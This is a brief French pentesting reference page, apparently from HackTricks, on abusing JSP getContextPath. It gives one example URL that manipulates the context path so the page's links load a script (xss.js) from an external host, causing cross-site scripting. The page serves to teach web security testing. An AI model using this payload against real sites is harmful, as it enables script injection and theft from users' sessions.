16 lines
489 B
Markdown

# JSP
{{#include ../../banners/hacktricks-training.md}}
## **abuse de getContextPath**
Info de [ici](https://blog.rakeshmane.com/2020/04/jsp-contextpath-link-manipulation-xss.html).
```
http://127.0.0.1:8080//rakeshmane.com/xss.js#/..;/..;/contextPathExample/test.jsp
```
En accédant à ce site, vous pouvez modifier tous les liens pour demander des informations à _**rakeshmane.com**_ :
![](<../../images/image (326).png>)
{{#include ../../banners/hacktricks-training.md}}